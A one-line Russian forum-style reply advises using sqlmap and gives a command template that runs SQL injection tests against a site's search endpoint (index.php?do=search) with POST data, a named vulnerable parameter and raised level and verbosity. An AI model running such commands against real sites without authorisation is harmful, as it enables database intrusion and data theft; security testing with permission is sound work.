юзай sqlmap python ./sqlmap.py -u "ТВОЙСАЙТ/index.php?do=search" --data="POST-КОД" -p уязвимый параметр --level 2 -v 3